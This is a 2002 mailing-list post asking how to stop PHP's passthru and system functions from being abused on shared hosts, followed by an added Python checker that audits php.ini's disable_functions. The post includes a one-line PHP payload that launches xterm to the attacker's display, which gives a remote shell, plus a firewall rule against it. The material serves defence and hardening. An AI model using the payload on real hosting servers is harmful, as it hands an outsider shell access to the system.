Vulnerability Development mailing list archives
php & passthru & system
From: Evrim ULU <evrim () envy com tr>
Date: Tue, 23 Apr 2002 11:15:22 +0300
Hi, I was wondering if there is a way to disable the passthru and system functions in PHP easily.
There are a lot of web hosting firms serving PHP with FTP accounts, and I've seen that if their firewall is not configured properly I can open an xterm with my user privileges.
<? passthru("`which xterm` --display=my_ip:0.0"); ?>
The same thing is also valid for system, of course. Abusing the system after having shell access is easy. Most of the sysadms do not patch the system since nobody has valid shell access.
Is there an easy way to disable these functions before compilation & after compilation, and any firewall rules like -A OUTPUT -p tcp --destination-port 6000 -j DROP?
thnx.
--
Evrim ULU evrim () envy com tr / evrim () core gen tr sysadm http://www.core.gen.tr
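For the hardening side of this question, PHP's `disable_functions` directive in php.ini is the built-in switch for turning functions off after compilation. The following is an added example, not part of the original post: a Python audit that reads php.ini text and lists the shell-executing functions a hosted script could still call. The function names beyond passthru and system, and the sample ini contents, are assumptions constructed for illustration.

```python
import re

# passthru and system are the two functions named in the post; the others are
# the remaining PHP built-ins that hand a command string to the shell.
SHELL_FUNCS = ("passthru", "system", "exec", "shell_exec", "popen", "proc_open")


def disabled_functions(ini_text):
    """Return the names listed in the effective disable_functions directive."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a php.ini comment
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip('"')
            # A later occurrence of the directive replaces an earlier one.
            disabled = {n.strip() for n in value.split(",") if n.strip()}
    return disabled


def audit(ini_text):
    """List the shell-executing functions that are NOT disabled."""
    disabled = disabled_functions(ini_text)
    return [f for f in SHELL_FUNCS if f not in disabled]


# Constructed sample: the directive is present but commented out, so it has no effect.
WEAK_INI = """[PHP]
; disable_functions = passthru,system
disable_functions =
"""

# Constructed sample: only the two functions from the post are covered.
PARTIAL_INI = """[PHP]
disable_functions = "passthru, system"
"""

# Constructed sample: every shell-executing function is listed.
HARDENED_INI = """[PHP]
disable_functions = passthru,system,exec,shell_exec,popen,proc_open ; shared hosting
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("partial", PARTIAL_INI),
                      ("hardened", HARDENED_INI)):
        print(name, "-> still callable:", audit(ini) or "none")
```

`disable_functions` is honoured only in php.ini, so a hosted user cannot re-enable a function from a script or a per-directory override. The partial case shows why listing only passthru and system leaves other routes to a shell open.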